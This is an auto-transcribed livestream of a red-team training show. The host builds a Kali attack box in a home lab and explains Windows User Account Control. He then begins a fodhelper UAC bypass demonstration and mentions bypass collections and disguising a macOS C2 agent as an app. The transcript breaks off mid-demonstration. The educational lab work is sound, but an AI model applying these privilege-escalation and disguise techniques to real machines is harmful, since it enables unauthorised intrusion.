Burst into flame. Technology. Burst into flame. Burst into flame.
What's up, hackers? Welcome to Attack on Tuesday. And tonight, we're going to do something a little bit different. We've got the home lab kind of up and running, and I'm excited to use it. So the first thing we are going to do tonight is actually set up our new attack box. So if you've ever wanted to set up a Kali machine from scratch, we're going to do that first. It shouldn't take too long because we have the VM up and running, obviously. But after we do that, we are going to do a deep dive into user account control. Which is the mechanism by which administrative access is controlled on Windows. And it is something that if you can bypass it, you can elevate your privileges, of course. So we're talking about privilege escalation tonight. We're talking about an important tactic and technique, especially in Windows environments. But we're also going to build out our attack box real quickly as well. So that's the plan for tonight. So just to catch everybody up here, in case if you don't join us on Saturdays to see the home lab build, this is the first time I think we're deploying it outside of Saturdays. So welcome to the home lab. This is Starbase. It is an enterprise server running in my house that I got specifically for this purpose. And what we're going to do, we have kind of our environment already set up here. We have a domain controller. We have actually our SOC lab, so we can actually detect things that go on in the environment. And we have a workstation that's going to be our victim tonight. And we have the attack box, which we are just set up. Hello, Mike. This is Proxmox. It is on top of KVM and QEMU. It is a pretty fast and free and open source hypervisor. I like it a lot. I certainly actually like it more than using VMware. So real handy, and it's running on top of an HP ProLiant DL380P Gen 8. It's, it's not the beefiest machine, but it works fine for my purposes. 20 cores, 40 virtual cores. I've got 64 gigs of RAM in there, which I can upgrade, of course, but right now it's doing fine for me. And about a terabyte of storage over a RAID 1. Again, all upgradable if I need to, but it's a good starting point. And actually, I was able to get this refurbed server at quite a discount, so not a bank breaker in order to get this all up and running. So that's the plan. Let's go build out Kali here. So I don't actually have to connect to it through this because I've already installed XRDP onto the Kali machine, and so I can actually jump right to it from my my host machine here. And that is exactly what I have going on. Now, I have a lot to do first. The first thing that I really need to do is set up a couple of things to install. To do that, I'm going to go over to my downloads folder. And let me zoom this in so it's a little bit easier for everyone else to see. Can I snap windows? I can. Fantastic. So the first thing I'm going to do is go ahead and clone my own repository that I've set up to specifically set this kind of machine up. And repo Kali Vagrant. It is intended to be used with Vagrant, but the scripts inside of it will work for anything. So we're going to go ahead and just grab that. GitHub.com. Kali Vagrant. Yeah. I mean, I hope. Oh, man. I have to remove this default route. That's wrong. Sudo IP rdel. So the way that the Kali box is set up is I have two interfaces. One of them is on an isolated network. For the lab, I have it isolated for like malware analysis purposes, and I have one that's connected to the actual internet. And right, as you can see, now that I got rid of that default route for the isolation lab, which was the 10.1.99 here, once I got rid of that, then everything is looking hunky-dory. Let me confirm that that's never going to happen again. Because I've got these two connections. The LAN Oh, can I not? I can't edit it while they're connected. That's fine. I'll deal with it later. Let's go to Kali Vagrant. All right, and then you can see I've got some stuff in here. So let's, I don't think there's anything that I need to do in setup. Oh yeah, there's plenty that I need to do. I don't need to set up my user because I already did all this. So I don't need to do any of this. I do want to set up ZenMap. I do want to set up Rust. And install Brave. Don't need to do that. Let's just do a sudo for each of these. Sudo. I don't need to install Radar 2. I should update that. I don't need Radar 2 at the moment. Jupyter stuff, we can leave that off for now. When we need it, we'll get it. I think that'll do for our initial build. I definitely want Brave. I definitely want Terminator. And I definitely want all this stuff. So that looks good. But there we go. Okay. Chmod setup.sh. Let's go ahead and fire that off. Go ahead and update some stuff. And this is, yeah, brand spanking new. All right, down comes the installer. Information. Cypher! How are you doing, friend? Excited for your talk. I can't wait to learn what a choice vendor is. I'm chilling. Been writing a lot of code. Last week was crazy. Last week was a sprint to get one project finished in the midst of doing another project. But we did get it finished. And I'm happy to say that WTFbins.wtf is up and running. Hey, Barry. WTF Bins basically came about with a conversation I was having with Gingerroot, and we were both talking. We're both blue teamers, and we were both talking about how we all, at threat hunters, we kind of all know there's like weird stuff that you'll find on a system when you're analyzing it or you're doing a deep investigation. Even incident responders, not just threat hunters. And there'll be stuff be like, wait a minute, why is it doing that? That's super weird. Is that suspicious? And almost all of the time, the answer is no. It's not malicious. It's just dumb. And if you don't have that really specific bit of knowledge, it'll really throw you for a loop. And so, and like every blue teamer I know has a collection of these. Every threat hunter I know has a bunch of these. And so I decided I wanted to catalog them. And so that's what WTF Bins is all about. It's real easy. You know, basically we're just going to put in this level of detail because we don't want to go too crazy, but there's a link to extra documentation when you submit one, and then they're tagged. So if you want to see everything that has to do with PowerShell, just click on the tag and you'll see all the PowerShell stuff. If you want to see all the Windows stuff, same deal. Yes, you can filter for more than one at a time. And if you want to contribute one, if you have one up your sleeve or you've encountered one before, all you have to do is go to contribute, and there's a GitHub issue template on the project that'll help you out. So all you have to do is set this up. And within like, I don't know, it's just me, but within a day or two, I'll take a look at it. If it looks good, we'll add it to the project. Right now, it's just a dumb JSON file. So it's not particularly complex. If we need to, we can grow into a richer database, but at the moment, it's serving its purpose. So that's what's up there. Because blue teamers need love too, even though we're on Attack on Tuesday. This is our red team night, but blue teamers need love too. Yes, we're gonna remove that. All right, we're installing Rust. Very important. I can't. Most of my toolchain at this point involves Rust, so I need to install Rust for this new Kali box. Lots of crazy news today. Hope everybody survived today's great internet outage. All right, this is coming down. Let's see, is there anything else I can do while this is getting set up? No, but it shouldn't take too long. I kind of want to wait till we get over the like early bird lull to start talking about UAC, which was the main material for tonight. I want to make sure we have everybody in class, basically. I also have some news for those of you who've been following the Offensive Notion development with Husky. So what we thought was going to be kind of a stretch goal ended up being really simple, which was a macOS agent. We are going to, I think by the end of tonight, because I'll do some work on it after the stream. By the end of the night, we will have a functioning macOS version of Offensive Notion that will be able to do elevation via sudo. It will be able to do persistence 2 ways via login items, if you're familiar with login items on macOS, and by a launchd launch agent. So and those are 2 ways that malware definitely uses for persistence. So we're going to be able to do that. Pretty exciting. Oh, and even able to make it look like a legitimate Mac app, thanks to a really fun old project. I don't know how many folks are super familiar with Mac OS development. It's kind of like it's a pretty rarefied thing, and most of the people in this community seem to mainly talk about Windows stuff. But there's this project called Platypus. It's so great. It hasn't been updated in a while, but I used to use it all the time actually as a Mac admin. And what you can do with Platypus is take any shell script, any script at all, and wrap it into a .app. And so it will end up looking, and give it a custom icon, the whole smash. So it'll end up looking like a legitimate Mac application when you deploy it. Now, it's not signed appropriately or anything. I mean, you can fix that, but it works phenomenally well. Yep, just looks like this. Give it the script. Give it any arguments. You can say interface text window or nothing. Give it the identifier, and then that's it. Hey, 1xyn, good to see you. We're building a new Kali box in the lab tonight. So this is... building Ferox Buster. Was that the last thing? Hello, Al's crew. Good to see everybody. Sorry I couldn't hang out for the rest of the stream. I was working? Which is the thing that happens. Helen, Orbital, good to see you all. What's going on today? We are talking about user account control. We're going to do a deep dive on UAC. If all goes according to plan, maybe we'll even be able to compile and use UAC me. We'll see how that goes. But first, we're actually using the lab. Finally, we're using the lab on Tuesdays. And so I have to build out a new Kali box. So I'm going to do that real quick. Should not take long because I've got it all scripted out. Damn Dang Fang, Steel Rain, Otman, Q0, thank you so much for the follows. But yeah, for those of you who aren't familiar, because you only join us on Tuesdays, no judgment whatsoever, we have our own enterprise server that is a virtualization lab. And it's just like chilling in my house. And the whole point was to be able to simulate environments without having to rely on Hack the Box or Try Hack Me or anything else like that. And it's up and running. We've got a domain controller. We have a SOC too. It's like with the Elk stack and everything, it's collecting data. We've got Sysmon deployed everywhere, so we can actually do red team and blue team stuff at the same time, which is pretty cool. And everything's controlled via Ansible playbooks, so we can add roles to our servers and then roll them back if we need to. Sandra, thank you so much for the subscription. And Top Fuel, thank you for the follow. The Only Beast Alive, same to you. Yeah, it's been like 5 or 6 weeks of work on Saturdays getting this up and running on stream. And you can check those out if you want to see those, see all the work that we did on YouTube. Pretty cool stuff. But now that it's up and running, I am amped. And we're finally going to get to do some real work with it tonight. Once the Kali box is built, which should not take long. I'm just, I'm installing my Rust. Al could not have arrived at a better time since we're installing the Rust toolchain here, specifically so that I can work the way that I like, which is with almost exclusively Rust tools at this point. But yeah, so the way that this works, you can actually check this out as well for those of you who just got here. I have the stuff that I like to use and the way that I like to build out my Kali environment. I have it. It was originally built for a Vagrant mechanism, but you can use it for any Kali box and modify the script as you like. John, any advantage to compiling your tools versus loading packages? In Rust's case, kind of. And honestly, it's because of ease of use. Here's what I mean. So the cargo command line interface is meant to help build out Rust projects. But the other thing that it does is install dependencies, right? And one of the things you can define in a Rust project is a binary target when you install a dependency. So for things like Rust Scan and Ferox Buster, if I install it with cargo, 2 things I get. Number 1, I get the compiled binary and it's already in my path because the cargo bins are in my path. That's cool. The other is updating them to the latest version is as simple as cargo install Ferox Buster or cargo install Rust Scan or whatever. And I don't have to worry about, going to GitHub or getting the package or whatever. It's right from the command line. And that, to me, feels a little bit better. But then again, I'll own that I am a little bit of a broken human being from years as a web developer, right? So I've used NPM, the node package manager, too much, and so I'm used to that way of dealing with my packages. It might not be great for you, but I actually really like using cargo. In fact, last week when I had to do some more web development for WTF bins, it was a relief to get back to cargo and the sanity of Rust. All right, very good. It's interesting. All right, so we did the initial setup, and I'm just going to look at final.sh and see how we're doing here. There's cd to scripts, and we're going to download some stuff. Yep, like that, like that, like that. Let's leave Cutter alone for the moment, but let's definitely go get these other tools that I like having. We don't have that today, but what we're doing, that's what the subject Chiron is for. Right at the bottom of your screen there's all about UAC. So today we're doing user account control. Ooh, right, what is Vagrant? That's a great question. Sometimes one of the things that's weird is like how siloed different tech communities are. I spent a lot of time as a developer, right, rather than doing security, and it's wild to me how much developer stuff or even DevOps stuff doesn't make it into the security conversation. For example, Al was doing Docker today, which is like my bread and butter. I can't tell you how much I've worked with Docker Swarm, and yeah, it's I was so glad to see that Al was covering it today. But Vagrant is this really neat tool to handle virtual machines. So basically, what Vagrant fills the need is you start from what's called a box, which is a virtual machine template, which has already been pre-built. And then you can add additional configuration, how many CPUs, how large the disk, different users, whatever you want to do, shared folders. And Vagrant will automate the provisioning of that virtual machine on the hypervisor of your choice. It can do Hyper-V, kind of. Is that base image an OVF? No, it's not. And that's a really important part of this. So Vagrant's boxes are their own thing. And they're built with another tool called Packer, which is the devil incarnate. And I hate it a lot. And we won't go into Packer because I've lost hours to trying to get Packer to do what I wanted to do. But Vagrant is great. And the reason I don't use it too much in our lab is because Vagrant makes some assumptions about your configuration that don't match my needs. But Vagrant is rad. And in fact, I was just using Vagrant last night because if we go to find boxes, one of the things that people might be surprised to learn is that you can get a virtualized... I think there's a Big Sur in here. Yep, there it is. This is the one I was using. You can actually virtualize Mac OS. And Vagrant boxes are a great, super easy way to get started with that. So this Vagrant box, for example, has Homebrew installed for you. And this is what the Vagrant file looks like to configure it. It's Ruby, in case you couldn't tell. But see that? And that's it. So you put this in a folder. You call Vagrant up. It downloads the box. It provisions the VirtualBox machine for you. It starts it up, and then you've got a running instance of macOS in your hypervisor. So I had macOS running on my Linux machine last night. It's pretty great. Doing builds of Offensive Notion. All right. So that's what Vagrant is. It's an automation layer for building virtual machines. All right, this all looks good. This all looks good. Yeah. Looks like there's not a lot of interop with other virtualization platforms. What are you talking about? Vagrant can do everything. Yeah, I really don't know what you mean by that. If you look at provisioning, or sorry, providers, I think, right? Yeah, so you can do VirtualBox, VMware, Docker, Hyper-V, and a custom provider. I mean, that's kind of the big ones. KVM maybe not so much, but that's where Packer comes in. How well does it integrate with Proxmox? Not at all, which is another reason why I don't use it, but Packer does. So Packer is like a layer below Vagrant. And what Packer does... Yeah, there's unofficial ones too. But Packer is like the layer below it. So with Vagrant, you start with pre-made boxes that are templates for your VMs, right? But with Packer, you build those templates yourself. And you can, like, you walk through the installation process, or you use an auto unattend file to get a Windows configuration. Right, so like if we're thinking about the DevOps layers here, Packer is like for virtual machines. Packer is the lowest layer because it's taking the raw installation ISO of Ubuntu or Windows or whatever, and then creating the template that you can use. Vagrant takes that because you can make Vagrant boxes with Packer. Vagrant takes that and then automates the spin up of the VM itself. But if that's not enough for you, there's also, from all this from HashiCorp, by the way, there's also to Terraform. And Terraform is like the ne plus ultra. Terraform is where you are deploying networks of virtual machines in the cloud or in your own hypervisor, and you're configuring everything with a single file. That's what Terraform is for. It is the DevOps dream made real. Pretty nuts. I've used Vagrant as a stand-in for cloud machines to locally test. My Ansible dev was... Yeah, that's awesome. I've used it the same way. John, is Packer a better fit for you than building a custom VM and cloning it? It would be if it worked. The problem is that Vagrant is Packer is very touchy. Like for example, with the Ubuntu Packer template build, you literally have to press spacebar during the installation startup. When the installation disk boots, you have to hit spacebar to get to the place where you can actually enter additional options. And then, no kidding, you have to give Packer a series of key commands, like key presses, that it will type into the installation for you to start configuring it the right way. So it's like wildly fragile. And I do not love how fragile it is. And what I have learned the very hard way is that it's actually easier for me, and it takes less time to build out the VM, like create a VM template manually for most of them, than it would be to drive myself crazy automating it every time. Now, I might go back and do battle with Packer again in like a month, because when some of my Windows VMs start to expire, I'm going to have to figure this out again, and maybe I'll have the energy to fight with Packer again. But for the moment, I'm willing to eat the time invested to spin up the vanilla install of Windows or whatever, and then after that, use Ansible to provision every other configuration that I want inside of my environment, including joining the thing to a domain, adding users, setting up whatever other configurations, installing packages. I can use Ansible for all of that, and the Ansible stuff is like set up. We're good to go on that. In fact, it's open source. If you want to see some of the playbooks that we've been working with, you can check them out. All right. So now I'm just setting up my environment here. So some things that I'm doing with my Kali box that not everybody else does. So obviously I'm installing just a few tools. I'm installing Powerline fonts for reasons. I'm setting up Fish, the Fish shell. And I'm also installing the Terminator terminal emulator. And I'm getting all of my Tmux stuff set up. Now, I'm not convinced that sudo's going to let me do... No, this should all be good. Yeah, this should all be good. Alright, sychmod, final. All right, have a good night, Fang. Good to meet you. Oh, and hey, Burnt Willie and DZE64, thank you so much for the follows. All right, just getting some of these projects here. And then the last things that you saw in that config, in case you were curious, the terminal emulator is Terminator, and I'm setting up Tmux and Vim to work the way that I want because I'm particular about those. It's funny, I never use Empire or Covenant, but I install the repos anyway. It's fine. Okay, so as you can see, Fish got messed up. I'm gonna exit Fish, and then Bob the Fish installed. And then the Terminator config never works. And let's just close this out. No, I don't use special keybinds. No, I don't want to quiet out those curls. I want to see them happen. All right, so let's see what went wrong. Okay. MRC. All right, awesome. My Vim stuff is set up. So we're going to do plug install. Installs my Vim plugins. We're almost done. This fun setup here. All right. Cool. Good. That's working the way that it should. And now the last thing that I have to do is, if I look at final.sh, oh, I have to go, should be in Kali Vagrant, huh? So, right. Terminator config should actually be in this directory. I'm going to copy that over. And the tmux.conf probably, well, we'll see if it's there. Yeah. I just cp Terminator config over to good. And now user bin fish. So PJZ, there are two scripts. There's setup and final. Setup has the making of a scripts. Remember that this is intended to be used with Vagrant, and it's kind of like a two-stage thing. So that part actually does work. Yeah, there's the Vagrant file right there. But I think if I open up Terminator one more time, and I will also add to panel. That's what's up. There's my transparent window to drive Al crazy. I've got my fish shell the way that I want it. If we go into downloads and Kali Vagrant, yep, the Git icons are working. Wonderful. And then tmux, let's fire that up. I have to install the plugins for tmux, but I think we're pretty much there. tmux.com. Oh, interesting. Nope, no cat abuse. Final.sh or grep tmux final.sh. Yeah, I want that. Yes, yes, I do have a tmux.conf. That's what this is for. I'm not sure why it didn't install, but... Okay, now, with any luck, yeah, so that's good. Do I use tmux scrollback? I don't know about that plugin. I use the built-in tmux scrollback and copy and paste stuff. But yes, I do that. Here I am doing that. But isn't it like Control V? It's capital I to install plugins. Ad ended. Did you say if I was right about UAC? Yes, user access control is what we're talking about with UAC. All right, I'm not going to worry about the tmux plugin right now. Let's get everything else going. So first of all, let me get my Brave browser set up. So this is kind of cool. What we're going to do with Brave, and this is something that I can't do on screen. I have to move this off just for a second, because what we're going to do is we're going to sync it with my other pen test stuff. Set Brave as default browser. Good. And the way that this works is sync. And then I have a sync code, but I'm going to move this off so you can't see my sync code. Yeah. Okay. Sync everything. Good. And with basically no effort, now my browser has all of my plugins synced, so everything's good there. Appearance, switch that to dark, and use the wide address bar, and I'm set. And that is how we do that. What part of the script edits my command line? So there are two things going on with the command line. First of all, I'm using the fish shell. And the second is I'm using Oh My Fish and Bob the Fish as theming for it. And so it gives me these nice power line symbols for Git and a few other handy things. Everyone's asking about the plugins that I use. Go check out the repo. I put it up on GitHub so I wouldn't have to say it 1,000 times. You can go read about the plugins I use because they're in the script. All right. So now I think we have, critical mass here, and that whole setup is sorted for the moment. I'll figure out what's up with Tmux in a second, but let's talk about user account control. Yeah, Fish is cool. Fish is, I prefer it to Z Shell, because I think its history is a little bit better. Its auto completion is a little bit better. It is not POSIX compliant, so it has its own shell syntax, so it's a little bit different than Bash and Z Shell. All right, so we're talking about user account control and what this means. So, Orbital just doesn't want me to actually get to user account control tonight. Redeem play the song. All right. Let's get all this going then. Monsters. All right. Gotta think about what I want to play tonight. But, all right, let's get the music down. And we'll bring the piano up. And get this mic off.
Sound check. Everything sound good? Just want to make sure I'm audible here. All right, it's been a minute. 2 songs, oh boy. Play something for International Women's Day. Oh, you know what? I've got the perfect song. Yeah, this song is about mothers. Mother, don't worry, I killed the last snake that lived in the creek bed. Mother, don't worry, I've got some money I saved for the weekend. Mother, remember how you were harsh with the girl who was with me. And mother, remember the blink of an eye when I breathed through your body. So may the sunrise bring hope where it once was forgotten. Suns are like birds flying upwards over the mountain. And mother, I made it up from the bruise of the floor of this prison. And mother, I lost it all of the fear of the Lord I was given. And mother, forget me now that the creek drank the cradle you sang to. But mother, forgive me, I sold your car for the shoes that I gave you. And so may the sunrise bring hope where it once was forgotten. Suns are like birds flying upwards over the mountain. Mother, don't worry, I've got a coat and some friends on the corner. And Mother, don't worry, she's got a garden we're planting together. Mother, remember the night that the dog had her pups in the pantry. Blood on the floor, fleas on their paws, you cried till the morning. So may the sunrise bring hope where it once was forgotten. Suns are like birds flying upwards over the mountain. All right, song 1 for Orbital. I'm not ready for that one yet. Oh, okay, you know what? Who's good with a longer one? Give me a thumbs up or something in chat if you're good with a longer one. All right. This is a 3-parter. Okay, here we go. This is all of the Crane Wave. It was a cold night, and the snow lay low. Pulled my coat tight against the falling down. The sun was all down. The sun was all down. I am a poor man, having wealth and no fame. Got my 2 hands and a house to my name. The winter's so long. The winter's so long. All the stars were crashing round as I laid eyes on what I'd found. It was a white crane, it was a helpless thing upon a red stain, with an arrow in its wing. It called and cried so. It called and cried so. And all the stars were crashing round as I laid eyes on what I'd found. My crane wife, my crane wife. My crane wife, my crane wife. Now I helped her and I dressed her wounds. How I held her beneath the rising moon. She stood to fly. She stood to fly away. She stood to fly. She stood to fly away. And all the stars were crashing round as I laid eyes on what I'd found. My crane wife, my crane wife. My crane wife, my crane wife. My crane wife arrived at my door in the moonlight, all star bright and tongue-tied. I took her in. We were married and bells rang sweet for our wedding, and our bedding was ready when we fell in. Sound the keening bell, see it's painted red, soft as fontanelle, the feathers in the thread, when all I ever meant to do was keep you, my crane wife, my crane wife, my crane wife. We were poorly, our fortunes fading hourly, and how she vowed me she could bring it back. But I was greedy, I was vain, and forced her to weaving on a cold loom in a closed room with down. Sound the keening bell, see it's painted red, soft as fontanelle, the feathers in the thread, when all I ever meant to do was keep you, my crane wife, my crane wife, my crane wife. There's a bend in the wind and it rakes at my heart. There is blood in the thread and it rakes at my heart. Rakes at my heart. My heart. My crane wife. And under the boughs unbound, clothed in a snowy shroud, she had no heart so hardened. Under the boughs unbound, each feather it fell from skin, till threadbare she grew thin. How were my eyes so blinded? Each feather it fell from skin, and I will hang my head low. I will hang my head low. sky looked bitter stained. A rain cloud and crane on wing. All out beyond horizons, a gray sky, a bitter stain. And I will hang my head low. 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 And I will hang my head low. Clothed in a snowy shroud, she had no heart so hardened.
Okay. I hope that was your. Oh, that was the the points worth. Hey, Husky. All right. So moving into hour 2, maybe we can actually talk about user account control. Just a thought. There's a rave going on in the quad. Very funny that you live at a campus. All right, let's talk about user account control then. Yeah, so user account control is that annoying thing that asks you if you want to make changes to your system. It's the thing that asks you for an administrator's password if you're not an administrator. And so, trivia for the class, who knows when user account control, what version of Windows introduced user account control to its architecture? Loka says Windows XP. OreoByte says Vista. Jondo says Win 7. Accuser says Win 7. OreoByte says Windows 2000. Just shotgunning as many guesses as possible. The answer is Windows Vista. Windows Vista was the first version of Windows to introduce user account control as a mechanism. Husky is correct. And if you think about it, think about what a security nightmare XP was, and that's why UAC was introduced in Vista. And I even remember being like 19 and having this happen and being like so annoyed that I'd have to enter passwords all the time to do stuff on my system. Yeah, but so the thing to understand about processes on Windows, one thing that I think is core to this understanding about user account control is the concept of access tokens. And so every process that's running has one of these things, and every user account has one of these things. It's an object that describes the security context of a process or thread. And so the token has all this information inside of it. The security identifier, think of it as like a user ID, groups for that user, and a list of the privileges, which is kind of super important, ACLs, sources, some metadata, But this access token is what determines what a user/process can do. And in fact, when you run whoami/priv, this is the information that you're getting, right? Right here. We pop open the privileges documentation and we kind of look at all these things. You're getting the token information function. Okay, so you're getting info from the token via the get token information function. All right. Why do tokens matter? Because user account control is all about tokens. This diagram, I'm sticking on the Microsoft documentation because it's actually pretty rad for this stuff. It's very clear about how this works. So Windows talks about this thing in admin approval mode, right? And what that means is what you are usually used to, unless you've made some crazy changes to your system, where even if you're a local admin on your Windows machine, when you go to do something sensitive, you're going to have to enter your password, or you're going to at least have to do that confirmation where you say, are you sure you want this to allow this thing to make changes to your computer? And you say yes. And the way this works is, like, generally when you log in as an admin in admin approval mode, you're going to get yourself a regular, like a full administrator access token. You get that. But explorer.exe, the thing that you open to, like, look at your system, right, doesn't. It gets a regular user token. And in order for any child process of Explorer, like an installer or something like that, in order for it to do admin stuff, it needs to elevate its privileges. Now, it can do so because we're in this mode where it can start getting access to this admin token for a process. But by default, the process doesn't have that permission. It's not supposed to. And of course, a standard user doesn't get to do that at all, right? This is the difference between an admin and a regular user on a Windows system, is access to this special token. Now, it turns out, as I was reading through this, some cool stuff about the consent prompt. When you see, it's an older version of it, but like this is the consent prompt that you see when you're in admin approval mode. In admin approval mode, by default, you don't have to enter a password if you're logged in as a local admin, right? You'll see something like this. When you're in a regular user context, you have to enter the credentials of an administrator in order to do something. This is the dialogue that you'll see to make that happen. So these are called UAC elevation prompts. And what it's basically performing is it's a gateway to allow you to get access to that admin token. Right? When an app attempts to run with an administrator's full access token, Windows 10 or Windows 11 first analyzes the executable file to determine its publisher. This is kind of cool. Good to know this. Apps are first separated into 3 categories based on the file's publisher. Windows 10 or 11, publisher verified, meaning it's signed, and everybody else. And I don't know if you knew this, but the UAC prompt is color-coded to let you know about that. I don't know why they would do that, because no one knows about the color coding unless you've read this documentation, but the prompt is color coded. Red background with a shield icon, the app is blocked by group policy, or the publisher is blocklisted. So you probably never see those, but they're there. So if we block an app by group policy, you're going to get a elevation prompt that has a red shield saying, no, get out of here, you can't do it. Blue, with a blue and gold shield icon, that's a Windows thing, Windows 10 app. So like if you were to open up schedule tasks in privileged mode or like event viewer or something like that, you would see exactly that. Blue background with a blue shield icon. It's signed by a trusted by the local computer. So it's a signed application. Yellow background with a yellow shield icon. We don't know who this is. You're on your own. So it turns out that those elevation prompts actually do have color codes to it. Kind of wild. There's another cool piece of information in this documentation. We'll get to it. It's kind of wild. So anyway, fun fact, some processes launch with more than one token. This is the flowchart that talks about how elevation works. A little bit tricky to understand what's going on here. But, we start kind of here. User performs operation requiring privilege. If it's just like a shell execute, we go to see, is it an ActiveX install? No. Then we check the user account control slider, which has like high, medium, and low settings, right? If it's low, we go to work, right? Because it says fine. If it's medium, then you get to see this flowchart about how this works. Windows signed and manifested for silent elevation. And the manifest of the application, right, is something that's packaged with it. If it's manifested for silent elevation, then we go to work. If it isn't, then we get our elevation prompt. Okay? So things to know. If you were able to get assigned, and remember that right now we're dealing, I know we're on red team night, but think about the attackers, like the Russian wiper malware that we're dealing with right now. Remember that they stole certificates, right? So they had signed software. So if you have signed software that also is manifested to run for silent elevation, guess what? you might get elevation without ever knowing it. There's some of this, what we're talking about, and some of this documentation here talks about how you trick the user. Bandit, exactly. The NVIDIA certs that were just leaked, absolutely. But there was also like EaseUS, a partition manager, and a few others as well. If secure desktop is enabled, then we go to an isolated elevation prompt in user. If it's not, and yes, we go to system. No, we just do regular stuff like this. But this is like the basic flow chart. And I should have done this earlier, but here's the link to this documentation from Microsoft. There are a couple of things that as attackers we should be aware of. First of all, is UAC ever disabled? I'll see if anybody has a cool answer to that question. Of course not, says Sar. The answer is no, kind of. So, that UAC slider we talked about UAC being high, medium, and low. Hey, Joe. I was hoping that you would join us tonight. UAC is a prepackaged privilege escalation technique that Microsoft gave us. It sure is. But it was even worse before we had it. So, here's the deal. If we set the user account control slider down to, low, it's still not off. The UAC service continues to run and cause an elevation request initiated by administrators to be auto-approved without showing a UAC prompt. So if that thing is set to low, the elevation request will just be rubber stamped. But it will automatically deny all elevation requests for standard users. So you're out of luck if you're in a standard context, but if you're in admin context, you're clear. There is one way. As I was reading this today, there is one way to fully disable UAC. But in order to do it, you have to be able to disable the policy. So either by local policy or by group policy, you have to do this. But this is a super bad idea. It turns out, like, if you disable UAC, a bunch of stuff will stop working. It says some UWP apps may not work when UAC is disabled. A bunch of other stuff is probably going to break too, because it's relying on that elevation pipeline. And if it doesn't have it available, if that service isn't running, there are lots of things that may just stop. So if you're thinking as an attacker, shutting this down might be super noisy and might actually break the thing that you're on anyway. We talked about manifests a little bit earlier, and manifests are kind of cool. They're part of an XML file that are inside, that are kind of actually compiled part of an This is my favorite part, though. Okay, so obviously installers are going to have to elevate their privileges, right? Obviously, they're going to have to elevate their privileges because they're going to be writing to privileged locations, right? And going to be doing stuff with the registry probably. So they have to. Check this out. So UAC includes this thing called installer detection technology. And Windows has basically a couple of algorithms to look for applications that are installers. But it only applies to 32-bit XEs. I guess all MSIs are. I don't really know. Or all, EXEs that are installers are set up to be that way. That can't be true, but applications without a requested execution level attribute in that manifest, remember, and interactive processes running as a standard user with UAC enabled. This is the funniest part to me. Before a 32-bit process is created, the following attributes are checked to determine whether it is an installer. Right here. The file name includes keywords such as install, setup, or update. Meaning, if you have a 32-bit application with the word install, setup, or update in the file name, just no matter what else it does, if it has those two things true, you will kick off a UAC prompt for it. And then there are a few other things, right? If the versioning fields include all of this stuff, then you'll have that as well. But remember that this only applies to 32-bit installers. And I seriously don't know if... It cannot be the case, right? That all MSIs and all, installer XEs are 32-bit. That doesn't make any sense to me. But this detection stuff is in play. Okay. So we talked about that. We talked about access tokens. Any questions so far about UAC and, how this works? Format all 32.exe is good to go. MSI exec launches MSI file. I think there's a 32-bit version, a 64-bit version. Yeah, that makes sense. Loka Samasta. I think that makes sense. So so there are a ton of UAC bypasses, and as Mayor Joe was saying, Windows is not super keen on patching them. Now, there are a bunch of them, and we've played with a bunch of them. The one for sure that we're going to do tonight, because of course we are, is our best friend, FOD Helper. And of course we actually have Joe's article right here, ready to go to walk us through it. Now, we've actually included this method inside of Offensive Notion, but we're going to do it manually tonight to show how it works. The other thing that I want to call out is that we're not really concerned about Defender tonight. We're going to actually turn it off for the first few things that we try to do. And that's because at the moment, I'm not talking about Defender. I want to talk about one thing at a time. I'm not talking about Defender. I'm talking about privilege escalation, right? My objective is to get that admin token, and I can use UAC bypasses to do it. Now, some of these are going to get caught by Defender and some won't. But that is not the point of this exercise. I hope everyone's clear on that point. The purpose is to get that token, and you may get caught a bunch of different ways. There's Defender. If you have Defender for endpoint, watch out, because then that's a next level of defense. Other kinds of EDRs will be watching for some of these behaviors, but maybe not all of them. All right. So we're going to go through the FOD Helper process here. And I also want to call out the other thing that if we get to it, we get to it. If we can get it to work, I'm not sure. Or if somebody can point me to a precompiled binary on this. Yeah, catjam is UAC me. Now, if you download this repo onto a machine with Defender, you're going to get lit up. But UAC is a database. It's essentially a project that has as many user account control bypasses that are active built into it as possible. So you can actually see in the keys here, these are the things that are inside of it. If we pop down a little bit to the later ones, you can see that a bunch of them are unfixed. And so the way that UAC works is supposed to be that you like run. There's one of the binaries is called akagi32.exe, and you give it the technique that you're going for, and if it requires any arguments, you do that, and then Bob's your uncle. The problem is compiling it is kind of difficult, or at least for me, because I'm not super familiar with this part of it. So I do have this thing loaded up in Visual Studio, but there are a lot of different moving parts, and the documentation could be a little bit clearer. I think it's intentionally obtuse. So if we can get this thing running, cool. But if not, that's how it goes. I'll give it another try another day. And if somebody here is familiar with UAC, I'm more than happy to learn from you about how this thing is supposed to work. But let's get started with FOD Helper, because we all know and love it. Okay. So, what is FOD Helper? As Joe tells us, FOD Helper is a trusted binary in Windows operating systems that allows elevation without requiring a UAC prompt with most UAC settings. And in fact, he says we can try it ourselves. So let's try it ourselves. The first thing that we're going to do is I have to set up a local admin here. To do that, I'm actually going to set up... Do I have Ramina installed? I will in a moment. Okay. So let's log in to our workstation. And I'm going to log in. Get out of here. To the workstation. I need an IP address on it, which I should have somewhere. The workstation is definitely DHCP'd. So let's go get that. I'll just real quick. Get the IP address here of our workstation. Now, I'm going to add this as a local administrator, but of course I could also have done something like go set up a group policy in my domain controller and added, a domain user as by policy as a local admin on any box in whatever group I wanted. Right, I could do that via group policy as well. Just to make it quick and dirty, I'm logged in here as an administrator, right? Yes, great. So I'm just going to grab the IP address real quick. By the way, now we get to see the color coding happen, right? User account control, notice that it's blue, meaning that it's trusted. It's part of Windows, really, is what that means. No Cortana. you. Oh my god. What is this, a try hack me box? 2 processors, 4 gigs of RAM. I mean, it's not... Have I had a chance to try GPU pass-through on Proxmox yet? No, but also this server doesn't have any GPU to speak of, really. .1.99.100. Great. Thank you. Okay, so we'll go to 10.1.99.100. And oh, did I not enable remote desktop for this thing? That is something I should do via group policy. Yes. There we go. SecLab. Now it's going to probably tell us something like... Yep, there it is. There we go. That's what I wanted. It's getting redrawn. Good. Hey, guess what? We have a remote connection. You'll have to see it. Now we can play with FOD Helper. So, as Joe was saying in his article, we have... Nope, that's the wrong tab. There we go. So we can run FOD Helper. Yeah, search FOD Helper, click Run as Administrator. So we can do that, right? So if we search for FOD Helper, and we do Run as Administrator, no UAC prompt, right? Which should have happened, because remember, that was launched via Explorer. And even though I am an administrator, it needs to get that token, right? So that's really interesting. So that's part 1. And then part 2 is, the way that the binary works, it checks a specific registry key for whatever legitimate reason and executes any instruction included. For exploitation purposes, we can create a new key in the current user hive, add the 